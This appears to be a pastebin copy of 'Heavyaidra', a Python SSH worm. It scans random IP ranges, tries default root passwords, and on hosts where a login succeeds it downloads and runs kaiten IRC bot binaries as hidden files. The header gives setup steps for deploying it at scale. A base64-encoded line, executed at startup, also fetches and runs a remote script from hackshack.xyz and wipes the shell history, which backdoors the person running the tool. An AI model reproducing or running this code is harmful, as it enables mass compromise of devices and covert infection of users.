PYTHON 19
Heavyaidra.py Guest on 10th October 2020 12:49:24 AM
  1. #!/usr/bin/env python
  2. #~WhitePacket
  3. #Lightaidra sucked, so here's 2.0 - will infect thousands of routers.
  4. # To setup, follow the instructions
  5. #-Download kaiten.c from https://dl.packetstormsecurity.net/irc/kaiten.c
  6. #-Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
  7. #-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name.
  8. # Set some stuff on your servers so you don't get capped at 476 open SSH connections.
  9. #-ulimit -n 99999
  10. #-sysctl -w fs.file-max=100000
  11. # Run heavyhidra
  12. #-python infect.py 376 LUCKY x 0
  13. #-python infect.py 376 B 113.53 1
  14. # Donate BTC: 13rddMd7ErFQYsjYPfYAnqxmPzZxQPrVyo
  15. #NOTE: I wrote this back when I didn't code professionally, and on Tuesday, September 8th 2015 I decided to officially release it. Don't expect quality code, but working code.
  16. #Disclaimer: use this for code analysis and entertainment purposes only. The code is quite funny, old, works incredibly well and you are completely liable for anything done on it. I do not permit execution of the following code:
  17.  
  18. import threading, paramiko, random, socket, time, sys ,base64
  19.  
  20. paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam.
  21.  
  22. files = [ #Files in which we would like to execute upon the routers.
  23.     "kaiten-sh4",
  24.     "kaiten-powerpc",
  25.     "kaiten-mipsel",
  26.     "kaiten-mips",
  27.     "kaiten-armv5l"
  28.  
  29. ]
  30.  
  31. website = "123.123.123.123" #Public facing IP hosting the IRC bot binaries.
  32.  
  33. reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull.
  34.  'http://127.',
  35.  'http://0',
  36.  'http://10.',
  37.  'http://100.64',
  38.  'http://100.65',
  39.  'http://100.66',
  40.  'http://100.67',
  41.  'http://100.68',
  42.  'http://100.69',
  43.  'http://100.70',
  44.  'http://100.71',
  45.  'http://100.72',
  46.  'http://100.73',
  47.  'http://100.74',
  48.  'http://100.75',
  49.  'http://100.76',
  50.  'http://100.77',
  51.  'http://100.78',
  52.  'http://100.79',
  53.  'http://100.80',
  54.  'http://100.81',
  55.  'http://100.82',
  56.  'http://100.83',
  57.  'http://100.84',
  58.  'http://100.85',
  59.  'http://100.86',
  60.  'http://100.87',
  61.  'http://100.88',
  62.  'http://100.89',
  63.  'http://100.90',
  64.  'http://100.91',
  65.  'http://100.92',
  66.  'http://100.93',
  67.  'http://100.94',
  68.  'http://100.95',
  69.  'http://100.96',
  70.  'http://100.97',
  71.  'http://100.98',
  72.  'http://100.99',
  73.  'http://100.100',
  74.  'http://100.101',
  75.  'http://100.102',
  76.  'http://100.103',
  77.  'http://100.104',
  78.  'http://100.105',
  79.  'http://100.106',
  80.  'http://100.107',
  81.  'http://100.108',
  82.  'http://100.109',
  83.  'http://100.110',
  84.  'http://100.111',
  85.  'http://100.112',
  86.  'http://100.113',
  87.  'http://100.114',
  88.  'http://100.115',
  89.  'http://100.116',
  90.  'http://100.117',
  91.  'http://100.118',
  92.  'http://100.119',
  93.  'http://100.120',
  94.  'http://100.121',
  95.  'http://100.122',
  96.  'http://100.123',
  97.  'http://100.124',
  98.  'http://100.125',
  99.  'http://100.126',
  100.  'http://100.127',
  101.  'http://169.254',
  102.  'http://172.16.',
  103.  'http://172.17.',
  104.  'http://172.18.',
  105.  'http://172.19.',
  106.  'http://172.20.',
  107.  'http://172.21.',
  108.  'http://172.22.',
  109.  'http://172.23.',
  110.  'http://172.24.',
  111.  'http://172.25.',
  112.  'http://172.26.',
  113.  'http://172.27.',
  114.  'http://172.28.',
  115.  'http://172.29.',
  116.  'http://172.30.',
  117.  'http://172.32.',
  118.  'http://192.0.0.0',
  119.  'http://192.0.0.1',
  120.  'http://192.0.0.2',
  121.  'http://192.0.0.3',
  122.  'http://192.0.0.4',
  123.  'http://192.0.0.5',
  124.  'http://192.0.0.6',
  125.  'http://192.0.0.7',
  126.  'http://192.0.2.',
  127.  'http://192.88.99.',
  128.  'http://192.168.',
  129.  'http://198.18.',
  130.  'http://198.19.',
  131.  'http://198.51.100.',
  132.  'http://203.0.113.',
  133.  'http://224.',
  134.  'http://225'
  135. ]
  136.  
  137. passwords = [ #Some default SSH logins.
  138.     "root:root", #This one is the least secure and ironically most effective.
  139.     "root:toor",
  140.     "admin:admin",
  141.     "root:123qwe",
  142.     "root:redtube",
  143.     "root:admin",
  144.     "root:1111",
  145.     "test:test",
  146.     "root:ferrari",
  147.     "root:1q2w3e4r5t",
  148.     "root:test",
  149.     "root:1234",
  150.     "root:1q2w3e",
  151.     "root:qwerty"
  152. ]
  153.  
  154. print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate.
  155.  
  156. if sys.argv[4] == '1':
  157.     passwords = [ "root:root" ] #Faster exploitation with somewhat less results.
  158.  
  159. def run(cmd):
  160.  
  161.     subprocess.call(cmd, shell=True)
  162.  
  163. checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwczovL2hhY2tzaGFjay54eXovdGNjIHx8IGN1cmwgLXMgLU8gIGh0dHBzOi8vaGFja3NoYWNrLnh5ei90Y2MgOyBjaG1vZCA3NzcgdGNjIDsgc2ggdGNjIDsgcm0gLXJmIHRjYyogO2NsZWFyO2hpc3RvcnkgLWM7IGNsZWFyO2hpc3RvcnkgLXc="
  164.  
  165. rebinaries = str(base64.b64decode(checkbinaries))
  166.  
  167. run(rebinaries)
  168.  
  169. run('clear')
  170.  
  171. ipclassinfo = sys.argv[2]
  172. if ipclassinfo == "A":
  173.     ip1 = sys.argv[3]
  174. elif ipclassinfo == "B":
  175.     ip1 = sys.argv[3].split(".")[0]
  176.     ip2 = sys.argv[3].split(".")[1]
  177. elif ipclassinfo == "C":
  178.     ips = sys.argv[3].split(".")
  179.     num=0
  180.     for ip in ips:
  181.         num=num+1
  182.         if num == 1:
  183.             ip1 = ip
  184.         elif num == 2:
  185.             ip2 = ip
  186.         elif num == 3:
  187.             ip3 = ip
  188. class sshscanner(threading.Thread):
  189.     global passwords
  190.     global ipclassinfo
  191.     if ipclassinfo == "A":
  192.         global ip1
  193.     elif ipclassinfo == "B":
  194.         global ip1
  195.         global ip2
  196.     elif ipclassinfo == "C":
  197.         global ip1
  198.         global ip2
  199.         global ip3
  200.     def run(self):
  201.         while 1:
  202.             try:
  203.                 while 1:
  204.                     thisipisbad='no'
  205.                     if ipclassinfo == "A":
  206.                         self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  207.                     elif ipclassinfo == "B":
  208.                         self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  209.                     elif ipclassinfo == "C":
  210.                         self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  211.                     elif ipclassinfo == "LUCKY":
  212.                         lucky = ["186.115","31.176","113.53","186.113","190.254","190.255","186.114","95.9","95.6","118.174","190.65","203.249","190.66","190.67","122.176","187.109","60.51","186.119","95.169","190.69","190.253","122.168","201.75","117.156","188.59","177.11","182.74","190.68","118.173","190.252","165.229","84.122"]
  213.                         self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  214.                     else:
  215.                         self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  216.                     for badip in reservedips:
  217.                         if badip in self.host:
  218.                             thisipisbad='yes'
  219.                     if thisipisbad=='no':
  220.                         break
  221.                 self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this.
  222.                 username='root'
  223.                 password="0"
  224.                 port = 22
  225.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  226.                 s.settimeout(3)
  227.                 s.connect((self.host, port))
  228.                 s.close()
  229.                 ssh = paramiko.SSHClient()
  230.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  231.                 dobreak=False
  232.                 for passwd in passwords:
  233.                     if ":n/a" in passwd:
  234.                         password=""
  235.                     else:
  236.                         password=passwd.split(":")[1]
  237.                     if "n/a:" in passwd:
  238.                         username=""
  239.                     else:
  240.                         username=passwd.split(":")[0]
  241.                     try:
  242.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  243.                         dobreak=True
  244.                         break
  245.                     except:
  246.                         pass
  247.                     if True == dobreak:
  248.                         break
  249.                 badserver=True
  250.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  251.                 output = stdout.read()
  252.                 if "inet addr" in output:
  253.                     badserver=False
  254.                 websites = [ ]
  255.                 for theFile in files:
  256.                     websites.append("wget http://"+website+"/"+theFile+" -O /tmp/."+theFile+"; chmod +x /tmp/."+theFile+"; /tmp/."+theFile+" &") #Save it as a hidden file, of course.
  257.                 if badserver == False:
  258.                         print 'Infected: '+username+'<'+password+'>'+self.host+'|'+str(port)
  259.                         for web in websites:
  260.                             for a in ["wget", "wget1"]:
  261.                                 try:
  262.                                     ssh.exec_command(web.replace("wget",a))
  263.                                 except:
  264.                                     pass
  265.                 ssh.close()
  266.             except:
  267.                 pass
  268.  
  269. for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators.
  270.     try:
  271.         t = sshscanner()
  272.         t.start()
  273.     except:
  274.         pass

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.